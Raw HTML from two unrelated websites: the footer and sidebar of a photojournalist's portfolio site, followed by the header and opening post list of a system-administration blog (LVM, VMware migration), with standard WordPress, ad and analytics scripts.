comment</a> <a id="like-3515" class="like-count icon heart_fill" href="#" > 0 </a> </div> </footer><!-- #entry-meta --> </div><!-- .entry-text --> </div><!-- .entry-content --> </article> <nav id="nav-below"> <h1 class="assistive-text">Post navigation</h1> <div class="nav-previous"><a href="http://www.petemarovichimages.com/page/2/" ><span class="meta-nav">&larr;</span> Older posts</a></div> </nav><!-- #nav-below --> </div><!-- .portfolios --> </section><!-- #primary --> <section id="secondary" class="widget-area" role="complementary"> <aside id="linkcat-135" class="widget widget_links"><h3 class="widget-title">CONSULTING</h3> <ul class='xoxo blogroll'> <li><a href="http://www.petemarovichimages.com/consulting-services/">Photo Editing</a></li> </ul> </aside> <aside id="linkcat-257" class="widget widget_links"><h3 class="widget-title">Quick Links</h3> <ul class='xoxo blogroll'> <li><a href="http://www.petemarovichimages.com/category/on-assignment/" title="Favorite Images and Outtakes Along With Commentary From Recent Assignments">On Assignment</a></li> <li><a href="http://www.petemarovichimages.com/category/discussion/" title="Discussion and opinions about equipment, techniques and trends in photography and photojournalism.">Discussion</a></li> <li><a href="http://www.petemarovichimages.com/category/bw-democracy/" title="Collection of images made on an iPhone using the Hipstamatic application with minimal processing to fit the ethical constraints of newspaper and magazine news photography.">Democracy in B&amp;W</a></li> <li><a href="http://www.petemarovichimages.com/category/on-my-lightbox/" title="Work Currently Being Edited">On My Lightbox</a></li> <li><a href="http://american-journal.org" target="_blank">American Journal</a></li> </ul> </aside> <aside id="linkcat-334" class="widget widget_links"><h3 class="widget-title">Downloads</h3> <ul class='xoxo blogroll'> <li><a href="http://www.petemarovichimages.com/product/2013-year-in-pictures-pdf-download/">2013 Year In Pictures PDF</a></li> <li><a href="http://www.petemarovichimages.com/product/2014-year-in-pictures-pdf-download/">2014 Year In Pictures PDF</a></li> </ul> </aside> <aside id="archives-3" class="widget widget_archive"><h3 class="widget-title">Archives</h3> <label class="screen-reader-text" for="archives-dropdown-3">Archives</label> <select id="archives-dropdown-3" name="archive-dropdown" onchange='document.location.href=this.options[this.selectedIndex].value;'> <option value="">Select Month</option> <option value='http://www.petemarovichimages.com/2018/07/'> July 2018 </option> <option value='http://www.petemarovichimages.com/2018/02/'> February 2018 </option> <option value='http://www.petemarovichimages.com/2017/01/'> January 2017 </option> <option value='http://www.petemarovichimages.com/2016/05/'> May 2016 </option> <option value='http://www.petemarovichimages.com/2016/03/'> March 2016 </option> <option value='http://www.petemarovichimages.com/2016/02/'> February 2016 </option> <option value='http://www.petemarovichimages.com/2015/10/'> October 2015 </option> <option value='http://www.petemarovichimages.com/2015/09/'> September 2015 </option> <option value='http://www.petemarovichimages.com/2015/07/'> July 2015 </option> <option value='http://www.petemarovichimages.com/2015/05/'> May 2015 </option> <option value='http://www.petemarovichimages.com/2015/02/'> February 2015 </option> <option value='http://www.petemarovichimages.com/2015/01/'> January 2015 </option> <option value='http://www.petemarovichimages.com/2014/12/'> December 2014 </option> <option value='http://www.petemarovichimages.com/2014/09/'> September 2014 </option> <option value='http://www.petemarovichimages.com/2014/08/'> August 2014 </option> <option value='http://www.petemarovichimages.com/2014/07/'> July 2014 </option> <option value='http://www.petemarovichimages.com/2014/06/'> June 2014 </option> <option value='http://www.petemarovichimages.com/2014/05/'> May 2014 </option> <option value='http://www.petemarovichimages.com/2014/04/'> April 2014 </option> <option value='http://www.petemarovichimages.com/2014/03/'> March 2014 </option> <option value='http://www.petemarovichimages.com/2014/02/'> February 2014 </option> <option value='http://www.petemarovichimages.com/2014/01/'> January 2014 </option> <option value='http://www.petemarovichimages.com/2013/12/'> December 2013 </option> <option value='http://www.petemarovichimages.com/2013/11/'> November 2013 </option> <option value='http://www.petemarovichimages.com/2013/10/'> October 2013 </option> <option value='http://www.petemarovichimages.com/2013/08/'> August 2013 </option> <option value='http://www.petemarovichimages.com/2013/06/'> June 2013 </option> <option value='http://www.petemarovichimages.com/2013/05/'> May 2013 </option> <option value='http://www.petemarovichimages.com/2013/04/'> April 2013 </option> <option value='http://www.petemarovichimages.com/2013/03/'> March 2013 </option> <option value='http://www.petemarovichimages.com/2013/02/'> February 2013 </option> <option value='http://www.petemarovichimages.com/2013/01/'> January 2013 </option> <option value='http://www.petemarovichimages.com/2012/11/'> November 2012 </option> <option value='http://www.petemarovichimages.com/2012/10/'> October 2012 </option> <option value='http://www.petemarovichimages.com/2010/08/'> August 2010 </option> <option value='http://www.petemarovichimages.com/2010/07/'> July 2010 </option> <option value='http://www.petemarovichimages.com/2010/06/'> June 2010 </option> <option value='http://www.petemarovichimages.com/2010/04/'> April 2010 </option> <option value='http://www.petemarovichimages.com/2010/03/'> March 2010 </option> <option value='http://www.petemarovichimages.com/2009/12/'> December 2009 </option> <option value='http://www.petemarovichimages.com/2009/10/'> October 2009 </option> </select> </aside><aside id="text-16" class="widget widget_text"> <div class="textwidget"><a href="http://mbsy.co/photoshelter/14363215" target="_blank" style="outline:none;border:none;"><img src="https://ambassador-api.s3.amazonaws.com/files/150_Aug_05_2013_21_51_32.jpg" alt="BartahTown" border="0" /></a></div> </aside></section><!-- #secondary .widget-area --> <!-- BeginFooter --> <footer id="colophon" role="contentinfo"> <div id="footer-widgets" class="three"> <div id="widget-1" class="widget"> <aside class="widget"><h3 class="widget-title">Testimonials</h3><div id="quotearea" style='font-size:12px;'><div id="quoterotator"> Loading Quotes... </div></div> <script type="text/javascript">setTimeout("quoteRotator.quotesInit()", 2000)</script> </aside><aside class="widget"> <div class="textwidget"><p>ALL CONTENT © <script language="javascript" type="text/javascript"> var today = new Date() var year = today.getFullYear() document.write(year) </script> PETE MAROVICH<br /> ALL RIGHTS RESERVED</p> <p>All photographs and text contained within petemarovichimages.com and archive.petemarovichimages.com are copyrighted material and are presented for web browser viewing only. </p> <p>No image or text contained within these sites may be reproduced, downloaded, stored, copied, manipulated, altered, or used in any form without prior written permission from Pete Marovich. </p> <p>Using any image as the base for another illustration or graphic content, including photography, is a violation of copyright and intellectual property laws. </p> <p>Violation of copyright is actively prosecuted.</p> </div> </aside> </div> <div id="widget-2" class="widget"> <aside class="widget"> <div class="textwidget"></div> </aside> </div> <div id="widget-3" class="widget"> <aside class="widget"> <div class="textwidget"><center><h3>Represented by</h3><a href="http://americanreportage.com"><img src="http://s4694.pcdn.co/wp-content/uploads/2017/07/newfinallogo-Reversed-1.jpg"></a></center></div> </aside><aside class="widget"> <div class="textwidget"><iframe style="border: none; overflow: hidden; width: auto; min-width:100%; max-width: 100%; height: 50px;" src="https://blink.la/widgets/button/u/marovich?size=s" frameborder="0" scrolling="no"></iframe></div> </aside><aside class="widget"><h3 class="widget-title">Search My Archive</h3><form id="photoshelter" action="http://pa.photoshelter.com/c/petemarovichimages/search" method="get"><input type="text" size="25" name="I_DSC"><input type="submit" id="s" value="Search My Archive"><input type="hidden" name="I_DSC_AND" value="t"><input type="hidden" name="_ACT" value="search"></form></aside><aside class="widget"><h3 class="widget-title">Sign Up for My Newsletter</h3> <div class="textwidget"><div class="createsend-button" style="height:27px;display:inline-block;" data-listid="r/63/BBB/C11/8EE913B633963FEC"> </div><script type="text/javascript">(function () { var e = document.createElement('script'); e.type = 'text/javascript'; e.async = true; e.src = ('https:' == document.location.protocol ? 'https' : 'http') + '://btn.createsend1.com/js/sb.min.js?v=2'; e.className = 'createsend-script'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(e, s); })();</script> </div> </aside><aside class="widget"><h3 class="widget-title">Contact</h3> <div class="textwidget"><p>EMAIL: pete [at] petemarovichimages.com</p> <p>PHONE: 540.560.3681</p> </div> </aside><aside class="widget"><h3 class="widget-title">Meta</h3> <ul> <li><a href="http://www.petemarovichimages.com/wp-login.php">Log in</a></li> <li><a href="http://www.petemarovichimages.com/feed/">Entries <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="http://www.petemarovichimages.com/comments/feed/">Comments <abbr title="Really Simple Syndication">RSS</abbr></a></li> <li><a href="https://wordpress.org/" title="Powered by WordPress, state-of-the-art semantic personal publishing platform.">WordPress.org</a></li> </ul> </aside> </div> </div><!-- end #footer-widgets --> <div id="site-generator"> Powered by <a href="http://wordpress.org/" title="Semantic Personal Publishing Platform" >WordPress</a> <span class="sep"> | </span> Theme: <a href="http://graphpaperpress.com/themes/gridspace/">Gridspace</a> by <a href="http://graphpaperpress.com/">Graph Paper Press.</a> Modified slightly by Pete Marovich.. </div> </footer><!-- #colophon --> </div><!-- #page --> <!-- EndFooter --> <div id="wpcp-error-message" class="msgmsg-box-wpcp warning-wpcp hideme"><span>error: </span>Content is protected !!</div> <script> var timeout_result; function show_wpcp_message(smessage) { if (smessage !== "") { var smessage_text = '<span>Alert: </span>'+smessage; document.getElementById("wpcp-error-message").innerHTML = smessage_text; document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp showme"; clearTimeout(timeout_result); timeout_result = setTimeout(hide_message, 3000); } } function hide_message() { document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp hideme"; } </script> <style type="text/css"> #wpcp-error-message { direction: ltr; text-align: center; transition: opacity 900ms ease 0s; z-index: 99999999; } .hideme { opacity:0; visibility: hidden; } .showme { opacity:1; visibility: visible; } .msgmsg-box-wpcp { border-radius: 10px; color: #555; font-family: Tahoma; font-size: 11px; margin: 10px; padding: 10px 36px; position: fixed; width: 255px; top: 50%; left: 50%; margin-top: -10px; margin-left: -130px; -webkit-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); -moz-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); } .msgmsg-box-wpcp span { font-weight:bold; text-transform:uppercase; } .error-wpcp { background:#ffecec url('http://s4694.pcdn.co/wp-content/plugins/wp-content-copy-protector/images/error.png') no-repeat 10px 50%; border:1px solid #f5aca6; } .success { background:#e9ffd9 url('http://s4694.pcdn.co/wp-content/plugins/wp-content-copy-protector/images/success.png') no-repeat 10px 50%; border:1px solid #a6ca8a; } .warning-wpcp { background:#ffecec url('http://s4694.pcdn.co/wp-content/plugins/wp-content-copy-protector/images/warning.png') no-repeat 10px 50%; border:1px solid #f5aca6; } .notice { background:#e3f7fc url('http://s4694.pcdn.co/wp-content/plugins/wp-content-copy-protector/images/notice.png') no-repeat 10px 50%; border:1px solid #8ed9f6; } </style> <script type='text/javascript'> /* <![CDATA[ */ var qpprFrontData = {"linkData":[],"siteURL":"http:\/\/www.petemarovichimages.com","siteURLq":"https:\/\/www.petemarovichimages.com"}; /* ]]> */ </script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.1.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View Cart","cart_url":"http:\/\/www.petemarovichimages.com\/cart\/","is_cart":"","cart_redirect_after_add":"yes"}; /* ]]> */ </script> <script type='text/javascript' src='//s4694.pcdn.co/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.6.14'></script> <script type='text/javascript' src='//s4694.pcdn.co/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='//s4694.pcdn.co/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.6.14'></script> <script type='text/javascript' src='//s4694.pcdn.co/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","fragment_name":"wc_fragments"}; /* ]]> */ </script> <script type='text/javascript' src='//s4694.pcdn.co/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.6.14'></script> <script type='text/javascript' src='http://s4694.pcdn.co/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> <script src="//static.getclicky.com/js" type="text/javascript"></script> <script type="text/javascript">try{ clicky.init(150813); }catch(e){}</script> <noscript><p><img alt="Clicky" width="1" height="1" src="//in.getclicky.com/150813ns.gif" /></p></noscript> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="HandheldFriendly" content="true"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,400i,700" rel="stylesheet"> <title>VION Technology Blog - Giving back to the community</title> <!-- This site is optimized with the Yoast SEO plugin v3.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Blog for all those System Administrators who have helped us and taught us something in the past. This is our way of giving back to the community by blogging about our problems, solutions and practical howto’s."/> <meta name="robots" content="noodp"/> <link rel="canonical" href="https://www.vionblog.com" /> <link rel="next" href="https://www.vionblog.com/page/2/" /> <link rel="publisher" href="https://plus.google.com/b/110769078233688619344/110769078233688619344"/> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="VION Technology Blog - Giving back to the community" /> <meta property="og:description" content="Blog for all those System Administrators who have helped us and taught us something in the past. This is our way of giving back to the community by blogging about our problems, solutions and practical howto’s." /> <meta property="og:url" content="https://www.vionblog.com" /> <meta property="og:site_name" content="VION Technology Blog" /> <meta property="fb:app_id" content="361902940560406" /> <meta property="og:image" content="http://www.vionblog.com/wp-content/uploads/2012/09/vion_logo.png" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Blog for all those System Administrators who have helped us and taught us something in the past. This is our way of giving back to the community by blogging about our problems, solutions and practical howto’s." /> <meta name="twitter:title" content="VION Technology Blog - Giving back to the community" /> <meta name="twitter:site" content="@VionBlog" /> <meta name="twitter:image" content="http://www.vionblog.com/wp-content/uploads/2012/09/vion_logo.png" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","url":"https:\/\/www.vionblog.com\/","name":"VION Technology Blog","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.vionblog.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="msvalidate.01" content="F80E88077D27D0271973CF134F2EE255" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//www.vionblog.com' /> <link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' /> <link rel='dns-prefetch' href='//cdn.rawgit.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.vionblog.com\/wp-includes\/js\/wp-emoji-release.min.js"}}; !function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='itempropwp-css' href='https://www.vionblog.com/wp-content/plugins/itempropwp/assets/css/itempropwp.css' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_stylesheet-css' href='https://www.vionblog.com/wp-content/plugins/captcha/css/front_end_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.vionblog.com/wp-includes/css/dashicons.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_desktop_style-css' href='https://www.vionblog.com/wp-content/plugins/captcha/css/desktop_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='cntctfrm_form_style-css' href='https://www.vionblog.com/wp-content/plugins/contact-form-plugin/css/form_style.css' type='text/css' media='all' /> <link rel='stylesheet' id='wordpress-popular-posts-css-css' href='https://www.vionblog.com/wp-content/plugins/wordpress-popular-posts/public/css/wpp.css' type='text/css' media='all' /> <link rel='stylesheet' id='wpsr_main_css-css' href='https://www.vionblog.com/wp-content/plugins/wp-socializer/public/css/wp-socializer.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wpsr_sb_fa_css-css' href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wpsr_sb_css-css' href='https://cdn.rawgit.com/vaakash/socializer/aaa23968/css/socializer.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mysocial-style-css' href='https://www.vionblog.com/wp-content/themes/mysocial/style.css' type='text/css' media='all' /> <link rel='stylesheet' id='genericons-style-css' href='https://www.vionblog.com/wp-content/themes/mysocial/genericons/genericons.css' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-style-css' href='https://www.vionblog.com/wp-content/themes/mysocial/responsive.css' type='text/css' media='all' /> <link rel='stylesheet' id='recent-posts-widget-with-thumbnails-public-style-css' href='https://www.vionblog.com/wp-content/plugins/recent-posts-widget-with-thumbnails/public.css' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var wpp_params = {"rest_api":"1","sampling_active":"0","sampling_rate":"100","ajax_url":"https:\/\/www.vionblog.com\/wp-json\/wordpress-popular-posts\/v1\/popular-posts\/","action":"update_views_ajax","ID":"","token":"9fd710047c","debug":""}; /* ]]> */ </script> <script type='text/javascript' src='https://www.vionblog.com/wp-content/plugins/wordpress-popular-posts/public/js/wpp-4.1.0.min.js'></script> <script type='text/javascript' src='https://www.vionblog.com/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://www.vionblog.com/wp-includes/js/jquery/jquery-migrate.min.js'></script> <link rel='https://api.w.org/' href='https://www.vionblog.com/wp-json/' /> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. */ pre { width: 100%; padding: 0; margin: 0; overflow: auto; overflow-y: hidden; font-size: 12px; line-height: 20px; background: #efefef; border: 1px dotted #777; margin-bottom: 20px; } pre code { padding: 10px; color: #333; } </style> <style type="text/css" media="all"> body, .breadcrumbs h1, .breadcrumbs h2, .breadcrumbs h3, .section-header h1, .section-header h2, .section-header h3, label, input, input[type="text"], input[type="email"], input[type="url"], input[type="search"], input[type="password"], textarea, button, .btn, input[type="submit"], input[type="reset"], input[type="button"], table, .sidebar .widget_ad .widget-title, .site-footer .widget_ad .widget-title { font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } h1,h2,h3,h4,h5,h6 { font-family: "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } a, a:hover, a:visited, .site-title a:hover, .sf-menu ul li li a:hover, .sf-menu li.sfHover li a:hover, #primary-menu li a:hover, #primary-menu li.current-menu-item a, #primary-menu li li a:hover, #primary-menu li li.current-menu-item a:hover, #secondary-menu li li a:hover, .entry-related h3 span, .entry-meta a, .pagination .page-numbers:hover, .edit-link a, .author-box .author-name span a, .comment-reply-title small a:hover, .sidebar .widget ul li a:hover, .site-footer .widget ul li a:hover, .mobile-menu ul li a:hover, .entry-tags .tag-links a:hover:before, .widget_tag_cloud .tagcloud a:hover:before, .entry-content a, .entry-content a:visited, .page-content a, .page-content a:visited, .widget a:visited, .entry-related .hentry .entry-title a:hover { color: #26b; } .pagination { border-bottom-color: #48d; } .mobile-menu-icon .menu-icon-close, .mobile-menu-icon .menu-icon-open { background-color: #26b; } #secondary-bar, button, .btn, input[type="submit"], input[type="reset"], input[type="button"], button:hover, .btn:hover, input[type="reset"]:hover, input[type="submit"]:hover, input[type="button"]:hover, .pagination .page-numbers.current { background-color: #48d; } </style> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-34876385-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-34876385-1'); </script> <!-- ADS --> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-5953425441443210", enable_page_level_ads: true }); </script> </head> <body class="home blog group-blog hfeed"> <div id="page" class="site"> <header id="masthead" class="site-header clear"> <div class="site-start clear"> <div class="container"> <div class="site-branding"> <div id="logo"> <span class="helper"></span> <a href="https://www.vionblog.com/" rel="home"> <img src="https://www.vionblog.com/wp-content/uploads/2013/08/viontech_logo.jpg" alt=""/> </a> </div><!-- #logo --> </div><!-- .site-branding --> <div id="happythemes-ad-2" class="header-ad widget_ad ad-widget"><div class="adwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- vionblog.com_header_responsive --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-5953425441443210" data-ad-slot="1037992610" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></div> <span class="mobile-menu-icon"> <span class="menu-icon-open">Menu</span> <span class="menu-icon-close"><span class="genericon genericon-close"></span></span> </span> </div><!-- .container --> </div><!-- .site-start --> <div id="primary-bar" class="container"> <nav id="primary-nav" class="main-navigation"> <div class="menu-primary-container"><ul id="primary-menu" class="sf-menu"><li id="menu-item-1254" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1254"><a href="https://www.vionblog.com/general/">General</a></li> <li id="menu-item-1252" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1252"><a href="https://www.vionblog.com/networking/">Networking</a></li> <li id="menu-item-1251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1251"><a href="https://www.vionblog.com/development/">Development</a></li> <li id="menu-item-1253" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1253"><a href="https://www.vionblog.com/database/">Database</a></li> <li id="menu-item-1250" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1250"><a href="https://www.vionblog.com/telephony/">Telephony</a></li> <li id="menu-item-1255" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1255"><a href="https://www.vionblog.com/blogging/">Blogging</a></li> </ul></div> </nav><!-- #primary-nav --> <div class="header-search"> <form id="searchform" method="get" action="https://www.vionblog.com/"> <input type="search" name="s" class="search-input" placeholder="Search..." autocomplete="off"> <button type="submit" class="search-submit"><span class="genericon genericon-search"></span></button> </form> </div><!-- .header-search --> </div><!-- #primary-bar --> <div id="secondary-bar" class="container clear"> <div class="container"> <nav id="secondary-nav" class="secondary-navigation"> </nav><!-- #secondary-nav --> </div><!-- .container --> </div><!-- .secondary-bar --> <div class="mobile-menu clear"> <div class="container"> <div class="menu-left"><h3>Pages</h3><div class="menu-primary-container"><ul id="primary-mobile-menu" class=""><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1254"><a href="https://www.vionblog.com/general/">General</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1252"><a href="https://www.vionblog.com/networking/">Networking</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1251"><a href="https://www.vionblog.com/development/">Development</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1253"><a href="https://www.vionblog.com/database/">Database</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1250"><a href="https://www.vionblog.com/telephony/">Telephony</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1255"><a href="https://www.vionblog.com/blogging/">Blogging</a></li> </ul></div></div><div class="menu-right"><h3>Categories</h3></div> </div><!-- .container --> </div><!-- .mobile-menu --> <span class="search-icon"> <span class="genericon genericon-search"></span> <span class="genericon genericon-close"></span> </span> </header><!-- #masthead --> <div id="content" class="site-content container clear"> <div id="primary" class="content-area clear"> <main id="main" class="site-main clear"> <div id="recent-content" class="content-loop"> <div id="post-1711" class="clear post-1711 post type-post status-publish format-standard has-post-thumbnail hentry category-general tag-linux tag-lvm"> <a class="thumbnail-link" href="https://www.vionblog.com/extending-lvm-volume/"> <div class="thumbnail-wrap"> <img width="200" height="200" src="https://www.vionblog.com/wp-content/uploads/2019/05/Debian-Logo.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Debian Logo" srcset="https://www.vionblog.com/wp-content/uploads/2019/05/Debian-Logo.png 200w, https://www.vionblog.com/wp-content/uploads/2019/05/Debian-Logo-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/extending-lvm-volume/">Extending LVM Volume</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">May 13, 2019</span> <span class="entry-category"> in <a href="https://www.vionblog.com/general/" title="View all posts in General" >General</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>It is time to take advantage of using LVM volumes when installing Linux servers. I got a Virtual Machine that&#8230; </p> <span><a href="https://www.vionblog.com/extending-lvm-volume/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1711 https://www.vionblog.com/?p=1711">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1711 --> <div id="post-1696" class="clear post-1696 post type-post status-publish format-standard has-post-thumbnail hentry category-general tag-virtualbox tag-vmware"> <a class="thumbnail-link" href="https://www.vionblog.com/migrate-virtualbox-vmware-esxi-6-5/"> <div class="thumbnail-wrap"> <img width="300" height="300" src="https://www.vionblog.com/wp-content/uploads/2018/10/virtualbox-to-vmware.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="VirtualBox To VMware" srcset="https://www.vionblog.com/wp-content/uploads/2018/10/virtualbox-to-vmware.png 300w, https://www.vionblog.com/wp-content/uploads/2018/10/virtualbox-to-vmware-150x150.png 150w" sizes="(max-width: 300px) 100vw, 300px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a href="https://www.vionblog.com/migrate-virtualbox-vmware-esxi-6-5/">Migrate VirtualBox to VMware ESXi 6.5</a></h2> <div class="entry-meta clear"> <span class="entry-author"><a href="https://www.vionblog.com/author/nstojanoski/" title="Posts by Nikola Stojanoski" rel="author">Nikola Stojanoski</a> &#8212; </span> <span class="entry-date">October 26, 2018</span> <span class="entry-category"> in <a href="https://www.vionblog.com/general/" title="View all posts in General" >General</a> </span> </div><!-- .entry-meta --> </div><!-- .entry-header --> <div class="entry-summary"> <p>There are a lot of tutorials out there but this method worked the best for me to migrate Virtual Machines&#8230; </p> <span><a href="https://www.vionblog.com/migrate-virtualbox-vmware-esxi-6-5/#respond" class="comments-link" ><span class="dsq-postid" data-dsqidentifier="1696 https://www.vionblog.com/?p=1696">add comment</span></a></span> </div><!-- .entry-summary --> </div><!-- #post-1696 --> <div id="post-1683" class="clear post-1683 post type-post status-publish format-standard has-post-thumbnail hentry category-general tag-vmware"> <a class="thumbnail-link" href="https://www.vionblog.com/vmware-6-5-cant-start-vm-host-crash/"> <div class="thumbnail-wrap"> <img width="300" height="300" src="https://www.vionblog.com/wp-content/uploads/2018/10/vmware-logo.png" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://www.vionblog.com/wp-content/uploads/2018/10/vmware-logo.png 300w, https://www.vionblog.com/wp-content/uploads/2018/10/vmware-logo-150x150.png 150w" sizes="(max-width: 300px) 100vw, 300px" /> </div><!-- .thumbnail-wrap --> </a> <div class="entry-header"> <h2 class="entry-title"><a 